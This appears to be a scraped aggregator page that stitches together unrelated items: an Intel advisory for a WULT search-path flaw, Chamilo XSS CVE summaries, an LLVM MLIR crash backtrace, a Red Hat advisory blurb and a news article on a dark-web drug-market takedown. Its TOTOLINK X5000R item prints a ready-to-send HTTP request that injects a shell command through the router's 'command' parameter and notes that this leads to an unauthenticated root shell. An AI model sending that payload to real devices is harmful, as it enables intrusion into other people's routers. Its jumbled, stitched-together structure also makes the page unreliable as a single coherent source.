Uncontrolled search path in the WULT software maintained by Intel(R) before version 1.0.0 (commit id 592300b) may allow an unauthenticated user to potentially enable escalation of privilege via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**WULT Software Advisory**

**Summary: **

A potential security vulnerability in the Wake Up Latency Tracer (WULT) software maintained by Intel® may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2023-27298

Description: Uncontrolled search path in the WULT software maintained by Intel(R) before version 1.0.0 (commit id 592300b) may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

WULT software maintained by Intel® before version 1.0.0 (commit id 592300b).

**Recommendations:**

Intel recommends updating the WULT software maintained by Intel® to version 1.0.0 (commit id 592300b) or later.

Updates are available for download at this location:

https://github.com/intel/wult/commits

**Acknowledgements:**

Intel would like to thank Sanidhya Ved for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2023-27298: INTEL-SA-00853

We talk to the Signal Foundation’s Meredith Whittaker about how the surveillance economy is newer than we all might realize—and what we can do to fight back.

How to Reclaim Your Online Privacy

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

llvm-project commit fdbc55a5 was discovered to contain a segmentation fault via the component mlir::IROperand<mlir::OpOperand.

Reproduced at commit fdbc55a5

mlir-opt --canonicalize temp.mlir

temp.mlir.txt

PLEASE submit a bug report to https://github.com/llvm/llvm-project/issues/ and include the crash backtrace.
Stack dump:
0.	Program arguments: mlir-opt --canonicalize temp.mlir
Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var \`LLVM\_SYMBOLIZER\_PATH\` to point to it):
0  mlir-opt                 0x000000010528a10c llvm::sys::PrintStackTrace(llvm::raw\_ostream&, int) + 72
1  mlir-opt                 0x000000010528a628 PrintStackTraceSignalHandler(void\*) + 28
2  mlir-opt                 0x0000000105288738 llvm::sys::RunSignalHandlers() + 148
3  mlir-opt                 0x000000010528bef8 SignalHandler(int) + 252
4  libsystem\_platform.dylib 0x00000001a33254c4 \_sigtramp + 56
5  mlir-opt                 0x0000000105320820 mlir::IROperand<mlir::OpOperand, mlir::Value>::insertIntoCurrent() + 52
6  mlir-opt                 0x0000000105320674 mlir::IROperand<mlir::OpOperand, mlir::Value>::set(mlir::Value) + 48
7  mlir-opt                 0x000000010532056c void mlir::IRObjectWithUseList<mlir::OpOperand>::replaceAllUsesWith<mlir::Value&>(mlir::Value&) + 228
8  mlir-opt                 0x00000001052ef310 mlir::Value::replaceAllUsesWith(mlir::Value) const + 40
9  mlir-opt                 0x0000000106b8f834 std::\_\_1::enable\_if<!std::is\_convertible<mlir::ValueRange&, mlir::Operation\*>::value, void>::type mlir::ResultRange::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 332
10 mlir-opt                 0x0000000106b8f36c void mlir::Operation::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 64
11 mlir-opt                 0x0000000109157758 mlir::RewriterBase::replaceOp(mlir::Operation\*, mlir::ValueRange) + 200
12 mlir-opt                 0x0000000105cb2ee8 (anonymous namespace)::DeduplicateAndRemoveDeadOperandsAndResults::matchAndRewrite(mlir::linalg::GenericOp, mlir::PatternRewriter&) const + 1240
13 mlir-opt                 0x0000000105f5a700 mlir::detail::OpOrInterfaceRewritePatternBase<mlir::linalg::GenericOp>::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&) const + 72
14 mlir-opt                 0x0000000109b158e8 mlir::PatternApplicator::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&, llvm::function\_ref<bool (mlir::Pattern const&)>, llvm::function\_ref<void (mlir::Pattern const&)>, llvm::function\_ref<mlir::LogicalResult (mlir::Pattern const&)>) + 1432
15 mlir-opt                 0x0000000108e67820 (anonymous namespace)::GreedyPatternRewriteDriver::simplify(llvm::MutableArrayRef<mlir::Region>) + 1640
16 mlir-opt                 0x0000000108e67068 mlir::applyPatternsAndFoldGreedily(llvm::MutableArrayRef<mlir::Region>, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 240
17 mlir-opt                 0x0000000105915fb4 mlir::applyPatternsAndFoldGreedily(mlir::Operation\*, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 76
18 mlir-opt                 0x0000000108d581d0 (anonymous namespace)::Canonicalizer::runOnOperation() + 132
19 mlir-opt                 0x0000000108ce0838 mlir::detail::OpToOpPassAdaptor::run(mlir::Pass\*, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int) + 512
20 mlir-opt                 0x0000000108ce0f08 mlir::detail::OpToOpPassAdaptor::runPipeline(mlir::OpPassManager&, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int, mlir::PassInstrumentor\*, mlir::PassInstrumentation::PipelineParentInfo const\*) + 364
21 mlir-opt                 0x0000000108ce30cc mlir::PassManager::runPasses(mlir::Operation\*, mlir::AnalysisManager) + 108
22 mlir-opt                 0x0000000108ce2ea0 mlir::PassManager::run(mlir::Operation\*) + 732
23 mlir-opt                 0x0000000108cc7b80 performActions(llvm::raw\_ostream&, bool, bool, llvm::SourceMgr&, mlir::MLIRContext\*, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, bool, bool) + 560
24 mlir-opt                 0x0000000108cc7714 processBuffer(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, bool, bool, bool, bool, bool, bool, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, llvm::ThreadPool\*) + 496
25 mlir-opt                 0x0000000108cc74dc mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 204
26 mlir-opt                 0x0000000108cc73f0 mlir::LogicalResult llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::callback\_fn<mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0>(long, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) + 80
27 mlir-opt                 0x0000000108ec4700 llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 96
28 mlir-opt                 0x0000000108ec41e4 mlir::splitAndProcessBuffer(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>, llvm::raw\_ostream&, bool, bool) + 128
29 mlir-opt                 0x0000000108cc4e48 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool) + 320
30 mlir-opt                 0x0000000108cc5050 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, mlir::PassPipelineCLParser const&, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool, bool) + 296
31 mlir-opt                 0x0000000108cc5bfc mlir::MlirOptMain(int, char\*\*, llvm::StringRef, mlir::DialectRegistry&, bool) + 2888
32 mlir-opt                 0x0000000104ac9df8 main + 148
33 dyld                     0x0000000121d1d088 start + 516

CVE-2023-29932: [mlir] canonicalize pass crashed with segmentation fault · Issue #58745 · llvm/llvm-project

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

Red Hat Security Advisory 2023-2097-03 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, deserialization, improper neutralization, information leakage, and remote shell upload vulnerabilities.

Red Hat Security Advisory 2023-2097-03

Operation SpecTor likely drew on leads from multiple dark web market busts, including the secret takedown of Monopoly Market in 2021.

A decade ago, US law enforcement was content to swat down a dark web black market for drugs and send its dealers and buyers scrambling to the next biggest anonymous online bazaar on their list. Now, one sprawling set of worldwide takedowns has revealed how those investigators are casting a much wider dragnet—one that doesn’t merely target dark web administrators, but also mines their databases for leads to relentlessly trace and arrest hundreds of dealers from those markets around the world.

Today, the US Department of Justice, Europol, and a list of law enforcement agencies in at least nine countries from Brazil to Poland revealed Operation SpecTor, a collection of dark web investigations that led to the arrest of 288 people worldwide—153 of whom were in the US. Officials also announced the seizure of nearly 1 ton of drugs, $53 million in cash and cryptocurrencies, and 117 firearms. Europol simultaneously revealed that German police had taken down the dark web site Monopoly Market, which had gone offline in late 2021 under mysterious circumstances, leaving many of its users to wonder if the market’s administrators had pulled an “exit scam” in which they absconded with users’ funds.

In Operation SpecTor, investigators appear to have leveraged information obtained through the seizure of Monopoly’s servers and data from other dark web market takedowns in recent years to find leads on hundreds of the dark web’s drug dealers—and even customers—on an unprecedented scale. “This represents the most funds seized and the highest number of arrests in any coordinated international action led by the Department of Justice against drug traffickers on the dark web,” US Attorney General Merrick Garland told reporters in a press conference. “The Justice Department is cracking down on criminal cryptocurrency transactions and the online criminal marketplaces that enable them.”

Along with Monopoly, Operation SpecTor appears to have exploited information obtained in previous dark web takedowns too. In his statement, Garland referred to both the takedown of Hydra, a Russia-based market that served as a massive hub of online drug sales and money laundering, and the smaller dark web black market Genesis, which focused on cybercrime products and services. But the Monopoly takedown, in particular, was kept under wraps for well over a year as law enforcement agencies worldwide followed leads from the case: A statement from Europol notes that “target packages” were “created by cross-matching and analyzing the collected data and evidence” from the seizure of Monopoly’s infrastructure.

All of that points to law enforcement’s increasing exploitation of the bonanza of evidence obtained in dark web takedowns. This has allowed them to carry out more far-reaching roundups of the dark web’s most prolific dealers, who are often active across multiple markets. Cryptocurrency tracing has also played a central role in expanding those operation’s targets. The databases of transactions obtained in dark web busts, if they can be decrypted, offer starting points for cryptocurrency tracers, who can then follow the money across blockchains to cryptocurrency exchanges where drug profits have been cashed out, and which can often be subpoenaed for users’ identifying information.

“It’s indeed likely that the arrests are related to data from all the different takedowns,” says one former law enforcement official involved in dark web busts, who asked not to be named. “Law enforcement combines all the information from the different seized data sets in order to identify the high-value targets. And if you identify cryptocurrency wallet addresses, you can often link activities on the different markets together, and the crypto exchanges might have the missing know-your-customer information you’re looking for.” In previous busts of dark web markets in recent years—including AlphaBay, Hansa, Wall Street Market, and Dark Market—agents obtained that sort of historical database in each case, cracking open a wealth of new leads.

Those databases can lead investigators not only to dealers on dark web markets, but also to buyers. While the DOJ and Europol didn’t reveal if any of the 288 arrests in Operation SpecTor targeted buyers, FBI deputy director Paul Abbate referred in today’s press conference to the FBI’s 56 field offices around the country carrying out “knock-and-talks” for the first time. In these operations, agents warn drug buyers that they have been identified without necessarily making arrests or pursuing charges against them.

As big as the scale of Operation SpecTor may be, it’s by no means the first DOJ operation to arrest hundreds of the dark web’s dealers. In 2020, for instance, the Justice Department announced the arrest of 179 individuals in Operation DisrupTor, and in 2021 another 150 in HunTor. (Each of those operation names refers to Tor, the anonymity software that serves as a key component of the dark web’s hidden marketplaces.)

While SpecTor nearly doubles the head count of those previous roundups of dark web dealers, it also illustrates, perhaps, that even these massive crackdowns haven’t previously prevented new generations of dealers from immediately taking their places. Even as Garland, the attorney general, touted law enforcement’s repeated successes following those dealers’ trails, he seemed to concede that the dark web’s trade in criminal contraband isn’t going away.

“There is a bit of a whack-a-mole problem here,” Garland told reporters. “We’re whacking as hard as we can.”

Tag

#acer